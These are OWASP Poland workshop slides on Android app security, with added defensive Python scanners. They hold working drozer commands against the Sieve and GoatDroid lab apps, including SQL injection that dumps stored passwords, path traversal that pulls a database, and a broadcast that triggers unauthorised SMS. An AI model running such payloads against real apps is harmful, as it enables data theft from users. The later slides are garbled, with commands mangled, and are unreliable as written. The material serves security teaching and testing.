• http://www.slideshare.net/Sperasoft/sperasoft-talks-android-security-threats?qid=d4d0db3a-0451-4150-95e0-dcd364cc95b4&v=qf1&b=&from_search=8
• http://www.eazytutz.com/android/android-architecture
• http://www.tutorialspoint.com/android/android_architecture.htm
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
[diagram: Activities, Services, Content providers, Broadcast receivers]
Android Application Components
AndroidManifest.xml defines in which way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
  <uses-permission android:name="string" />
  <permission android:protectionLevel="…" />
• Components and their attributes
[screenshot: AndroidManifest.xml]
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
[diagram: example component attributes for Activities, Services, Content providers and Broadcast receivers]
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.
  Intent intent = new Intent(Intent.ACTION_VIEW);
  intent.setData(Uri.parse("http://www.google.com"));
  String pack = "com.android.browser";
  ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
  intent.setComponent(comp);   // explicit target: only this component receives the intent
  startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC - the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
  dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer
Is installed in a default package of AppUse together with adb, so it's enough to just „click-and-play”
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• Launching by intents, it's possible to achieve the following:
  – Modify data in background
  – Tricking the user
  – Leaking sensitive information
Activity components attacks
• General hijacking scheme
  [diagram: general hijacking scheme – components A, B and E]
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities:
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although they generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported or respond to/accept input from message formats like intents, files or the network stack).
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat running to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions:
  run app.provider.info --permission null
Content providers attacks
• Unrestricted access to app database
  – Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
Content providers attacks
• Unrestricted access to app database
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
  dz> run scanner.provider.injection -a com.mwr.example.sieve
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
  | Password         | pin  |
  | thisismypassword | 9876 |
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
Content providers demo
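The two Sieve findings above come from the same two coding mistakes inside a provider: splicing the caller's projection/selection strings into SQL, and using the URI path as a file path. The following is an added example, not code from the workshop or from Sieve: a stand-alone Python model of a provider's `query()` and `openFile()` logic, the vulnerable form beside the hardened form, run against an in-memory SQLite database with constructed rows. The table layout, the `PROVIDER_ROOT` path and all function names are the example's own assumptions; the hardened version checks column names against an allow-list, binds values as parameters, and canonicalises the file path before checking it stays under the provider's root.

```python
import posixpath
import sqlite3

# Hypothetical directory the backup provider is allowed to serve (assumption for the example).
PROVIDER_ROOT = "/data/data/com.example.app/files/backup"
PASSWORD_COLUMNS = ("_id", "service", "username", "password", "email")


def make_db():
    """In-memory stand-in for the provider's database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT, username TEXT,
                               password TEXT, email TEXT);
        CREATE TABLE Key(Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES (1, 'mail', 'alice', 'secret1', 'alice@example.org');
        INSERT INTO Key VALUES ('thisismypassword', '9876');
    """)
    return conn


def vulnerable_query(conn, projection, selection):
    """query() that splices caller-controlled strings into SQL: the pattern drozer's
    scanner.provider.injection detects. A projection of "* FROM Key--" turns the
    statement into SELECT * FROM Key and comments the rest out."""
    sql = "SELECT %s FROM Passwords WHERE (%s)" % (projection, selection)
    return conn.execute(sql).fetchall()


def hardened_query(conn, projection, selection_column, selection_arg):
    """Column names are checked against an allow-list; values travel only as bound parameters."""
    for col in list(projection) + [selection_column]:
        if col not in PASSWORD_COLUMNS:
            raise ValueError("unknown column: %r" % col)
    sql = "SELECT %s FROM Passwords WHERE %s = ?" % (", ".join(projection), selection_column)
    return conn.execute(sql, (selection_arg,)).fetchall()


def vulnerable_open_path(uri_path):
    """FileBackupProvider-style openFile(): the URI path is used as the file path, unchecked."""
    return uri_path


def hardened_open_path(uri_path):
    """Resolve the URI path under PROVIDER_ROOT; return None if it escapes the root."""
    candidate = posixpath.normpath(posixpath.join(PROVIDER_ROOT, uri_path.lstrip("/")))
    if candidate != PROVIDER_ROOT and not candidate.startswith(PROVIDER_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_query(db, "* FROM Key--", "1=1"))
    print("hardened:  ", hardened_query(db, ["username"], "service", "mail"))
    print("traversal: ", hardened_open_path("../../../../etc/hosts"))
```

In an Android provider the same shape applies with `SQLiteQueryBuilder.setProjectionMap()` for the allow-list and `selectionArgs` for the bound values, and with `File.getCanonicalPath()` for the path check; the Python version only models the decision logic.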
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plugged, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send an intent and enjoy
Broadcast receivers attacks
  <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
          <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action (GoatDroid's deliberately vulnerable receiver: the sender is never checked and the extras go straight into sendTextMessage):
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      // phone number and message text come unchecked from whoever sent the broadcast
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
Broadcast receivers attacks
  run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only code running under the same user ID as the current app will be able to access the component)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
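Whether a component is reachable from another app is decided entirely by the manifest, and the subtle case is the one the client-side-injection mitigations in the OWASP part also warn about: a component that declares an intent-filter but no android:exported is exported by default. The following is an added example, not code from the workshop: a Python audit of an AndroidManifest.xml that reports every exported component without a permission and flags android:debuggable. The sample manifest is constructed for the example and modelled on the GoatDroid receiver shown above; the package name is from that snippet, the other component names are invented.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")


def _attr(el, name):
    return el.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """Manifest default: an explicit android:exported wins; otherwise a component with an
    <intent-filter> is exported and one without is not. Providers defaulted to exported on
    old targetSdk levels, so an unset value there is treated as exported (conservative)."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return True
    return component.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return (tag, name, reason) findings for a manifest string."""
    root = ET.fromstring(xml_text)
    findings = []
    app = root.find("application")
    if app is None:
        return findings
    if (_attr(app, "debuggable") or "").lower() == "true":
        findings.append(("application", root.get("package", ""), "android:debuggable=true"))
    for comp in app.iter():
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp):
            continue
        name = _attr(comp, "name") or "?"
        # providers may guard reads/writes with separate permissions
        guarded = _attr(comp, "permission") is not None or (
            comp.tag == "provider"
            and (_attr(comp, "readPermission") or _attr(comp, "writePermission")))
        if guarded:
            continue
        how = ("explicit android:exported=true" if _attr(comp, "exported")
               else "implicitly exported (intent-filter, no android:exported)")
        findings.append((comp.tag, name, how + ", no permission"))
    return findings


# Constructed manifest modelled on the GoatDroid receiver above (not a real app's manifest).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.owasp.goatdroid.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application android:debuggable="true">
    <activity android:name=".activities.Main" android:exported="false" />
    <activity android:name=".activities.Login">
      <intent-filter><action android:name="android.intent.action.MAIN" /></intent-filter>
    </activity>
    <service android:name=".services.Sync" android:exported="true"
             android:permission="org.owasp.goatdroid.fourgoats.SYNC" />
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter><action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" /></intent-filter>
    </receiver>
    <provider android:name=".providers.Backup" android:authorities="org.owasp.goatdroid.fourgoats.backup"
              android:exported="true" android:readPermission="org.owasp.goatdroid.fourgoats.READ" />
  </application>
</manifest>"""


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print(finding)
```

The launcher activity shows up as well, which is correct: it must be exported, and triaging such expected hits is part of the review. Run it on a real manifest after `apktool d app.apk`, which writes the decoded AndroidManifest.xml next to the Smali output.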
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
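Once the package directory has been pulled, the review is mechanical: which files are readable by other UIDs, which shared_prefs entries carry credentials in clear, which databases are plain SQLite. The following is an added example, not code from the workshop, that does that walk in Python over a constructed sample tree the block creates itself (it imitates a pulled /data/data/<package> layout; no real app's data is used). The key-name heuristic and the file modes chosen for the sample are the example's own assumptions.

```python
import os
import re
import stat
import tempfile
import xml.etree.ElementTree as ET

# Heuristic for preference keys worth a look (assumption; tune per app).
SENSITIVE_KEY = re.compile(r"(pass(word|wd)?|secret|token|api[_-]?key|\bpin\b)", re.I)


def world_readable(path):
    """True if the file mode grants read to 'other', the effect of MODE_WORLD_READABLE."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def sensitive_pref_entries(xml_path):
    """(name, value) pairs from a shared_prefs XML whose key name looks sensitive."""
    hits = []
    for el in ET.parse(xml_path).getroot():
        name = el.get("name", "")
        if SENSITIVE_KEY.search(name):
            hits.append((name, (el.text or el.get("value") or "").strip()))
    return hits


def scan_app_data(data_dir):
    """Walk a pulled package directory; return sorted (relative_path, issue) findings."""
    findings = []
    for dirpath, _, filenames in os.walk(data_dir):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, data_dir).replace(os.sep, "/")
            if world_readable(full):
                findings.append((rel, "world-readable"))
            if os.path.basename(dirpath) == "shared_prefs" and fn.endswith(".xml"):
                for name, _value in sensitive_pref_entries(full):
                    findings.append((rel, "plaintext sensitive preference '%s'" % name))
            if fn.endswith((".db", ".sqlite")):
                with open(full, "rb") as f:
                    # an SQLCipher database does not start with the plain SQLite magic
                    if f.read(16).startswith(b"SQLite format 3"):
                        findings.append((rel, "unencrypted SQLite database"))
    return sorted(findings)


def build_sample_app_data():
    """Constructed sample tree imitating /data/data/<package> (not from any real app)."""
    root = tempfile.mkdtemp(prefix="appdata_")
    prefs = os.path.join(root, "shared_prefs")
    dbs = os.path.join(root, "databases")
    os.makedirs(prefs)
    os.makedirs(dbs)
    pref_file = os.path.join(prefs, "settings.xml")
    with open(pref_file, "w") as f:
        f.write('<?xml version="1.0" encoding="utf-8"?>\n<map>\n'
                '  <string name="username">alice</string>\n'
                '  <string name="password">hunter2</string>\n'
                '  <boolean name="remember_me" value="true" />\n</map>\n')
    os.chmod(pref_file, 0o664)          # readable by everyone, as MODE_WORLD_READABLE would make it
    db_file = os.path.join(dbs, "app.db")
    with open(db_file, "wb") as f:
        f.write(b"SQLite format 3\0" + b"\0" * 16)
    os.chmod(db_file, 0o600)            # private, but still an unencrypted database
    return root


if __name__ == "__main__":
    for finding in scan_app_data(build_sample_app_data()):
        print(finding)
```

The world-readable check only means something when the tree keeps the on-device modes (`adb pull` as a shell user on an unrooted phone cannot read private app data at all), so in practice run it from a backup or a rooted test device.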
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean by „incorrectly”?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a „chain of trust”
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
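Reading `adb logcat` by eye works for a demo; for an app that logs thousands of lines it is better to parse the threadtime format and grep the message part for credential-, token-, e-mail- and location-shaped values, filtered to the app's PID. The following is an added example, not code from the workshop: a Python logcat scanner over five constructed log lines embedded in the block (they imitate `adb logcat -v threadtime` output and do not come from any real app). The detection patterns are the example's own heuristics.

```python
import re

# "MM-DD HH:MM:SS.mmm  PID  TID LEVEL TAG     : message"  (adb logcat -v threadtime)
LOGCAT_LINE = re.compile(
    r"^(?P<ts>\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>\S+)\s*:\s(?P<msg>.*)$")

# Value shapes that should never appear in a log (heuristics, assumption for the example).
LEAK_PATTERNS = {
    "credential": re.compile(r"\b(?:pass(?:word|wd)?|pwd|pin)\s*[=:]\s*\S+", re.I),
    "bearer/session token": re.compile(r"\b(?:token|session|auth|bearer|jwt)\s*[=:]\s*[A-Za-z0-9._-]{16,}", re.I),
    "e-mail address": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "GPS coordinates": re.compile(r"-?\d{1,3}\.\d{4,}\s*,\s*-?\d{1,3}\.\d{4,}"),
    "card number": re.compile(r"\b(?:\d[ -]?){13,19}\b"),
}


def parse_logcat_line(line):
    """Split one threadtime line into its fields, or None if it is not a log record."""
    m = LOGCAT_LINE.match(line)
    return m.groupdict() if m else None


def find_log_leaks(lines, only_pid=None):
    """Return (tag, kind) for every message matching a leak pattern, optionally for one PID."""
    findings = []
    for line in lines:
        rec = parse_logcat_line(line)
        if rec is None:
            continue
        if only_pid is not None and rec["pid"] != str(only_pid):
            continue
        for kind, pattern in LEAK_PATTERNS.items():
            if pattern.search(rec["msg"]):
                findings.append((rec["tag"], kind))
    return findings


# Constructed sample log (not captured from a real device).
SAMPLE_LOGCAT = [
    "03-01 10:15:02.114  4321  4321 D LoginActivity: login ok user=alice password=hunter2",
    "03-01 10:15:02.120  4321  4350 I OkHttp  : Authorization: Bearer token=eyJhbGciOiJIUzI1NiJ9.e30.abcdefghijklmnop",
    "03-01 10:15:03.001  4321  4321 V Analytics: location 52.4064123,16.9251681 sent to partner",
    "03-01 10:15:03.050   812   812 I ActivityManager: Displayed com.example.app/.MainActivity: +312ms",
    "03-01 10:15:04.200  4321  4321 D Profile : email alice@example.org loaded",
]


if __name__ == "__main__":
    for tag, kind in find_log_leaks(SAMPLE_LOGCAT, only_pid=4321):
        print("%-15s %s" % (tag, kind))
```

Feeding the scanner live is a matter of `adb logcat -v threadtime | python scanner.py` with `sys.stdin` in place of the sample list; the PID filter is what keeps system services' chatter out of the report.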
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
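Most of the M3 findings (trust-all TrustManagers, accept-all HostnameVerifiers, SSLv3/RC4 left enabled) and the M6 findings (hard-coded keys, MD5/SHA1/DES, ECB) are textual patterns in the decompiled Java, which is why Mallodroid can find the former automatically. The following is an added example, not code from the workshop or from Mallodroid: a Python rule scanner over decompiled source, serving both the M3 and the M6 review steps, run on two constructed Java snippets embedded in the block (they are written for the example, not taken from any app). The rule list is the example's own and deliberately small; the hits are leads for manual review, not proof of exploitability.

```python
import re

# (risk label, pattern over decompiled Java source); heuristics chosen for the example
RULES = [
    ("M3: TrustManager that accepts every certificate",
     re.compile(r"checkServerTrusted\s*\([^)]*\)\s*(?:throws\s+[\w.]+\s*)?\{\s*\}", re.S)),
    ("M3: HostnameVerifier that accepts every hostname",
     re.compile(r"boolean\s+verify\s*\([^)]*\)\s*\{\s*return\s+true\s*;\s*\}", re.S)),
    ("M3: ALLOW_ALL_HOSTNAME_VERIFIER used",
     re.compile(r"\bALLOW_ALL_HOSTNAME_VERIFIER\b")),
    ("M3: weak protocol or cipher enabled",
     re.compile(r'"(?:SSLv2|SSLv3|\w*RC4\w*)"')),
    ("M6: weak or deprecated algorithm",
     re.compile(r'getInstance\s*\(\s*"(?:MD4|MD5|SHA-?1|RC4|ARCFOUR|DES)(?:/[^"]*)?"')),
    ("M6: hard-coded key or secret",
     re.compile(r'(?:SecretKeySpec|IvParameterSpec)\s*\(\s*"[^"]+"\.getBytes\('
                r'|\b(?:KEY|SECRET|PASSWORD|IV)\s*=\s*"[^"]+"')),
    ("M6: ECB mode",
     re.compile(r'"AES/ECB/')),
]


def scan_java_source(source):
    """Return the labels of every rule that matches, each once, in rule order."""
    return [label for label, pattern in RULES if pattern.search(source)]


# Constructed snippet with the anti-patterns the slides describe (not from a real app).
SAMPLE_BAD = r'''
public class NaiveTrust implements X509TrustManager {
    public void checkClientTrusted(X509Certificate[] c, String a) throws CertificateException { }
    public void checkServerTrusted(X509Certificate[] c, String a) throws CertificateException { }
    public X509Certificate[] getAcceptedIssuers() { return null; }
}
HostnameVerifier hv = new HostnameVerifier() {
    public boolean verify(String hostname, SSLSession session) { return true; }
};
socket.setEnabledProtocols(new String[] { "SSLv3", "TLSv1" });
private static final String KEY = "s3cr3tK3y1234567";
Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
MessageDigest md = MessageDigest.getInstance("MD5");
'''

# Constructed snippet using platform defaults and a password-derived key (also not from a real app).
SAMPLE_GOOD = r'''
SSLContext ctx = SSLContext.getInstance("TLS");
HostnameVerifier hv = HttpsURLConnection.getDefaultHostnameVerifier();
Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
MessageDigest md = MessageDigest.getInstance("SHA-256");
SecretKey key = deriveFromUserPassword(password, salt, 100000);
'''


if __name__ == "__main__":
    print("bad :", scan_java_source(SAMPLE_BAD))
    print("good:", scan_java_source(SAMPLE_GOOD))
```

To run it over a decompiled tree, walk the Luyten/JD-GUI output directory and call `scan_java_source()` on each `.java` file, recording the file name next to the labels.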
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – A shared file
  – A server response
  – A third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
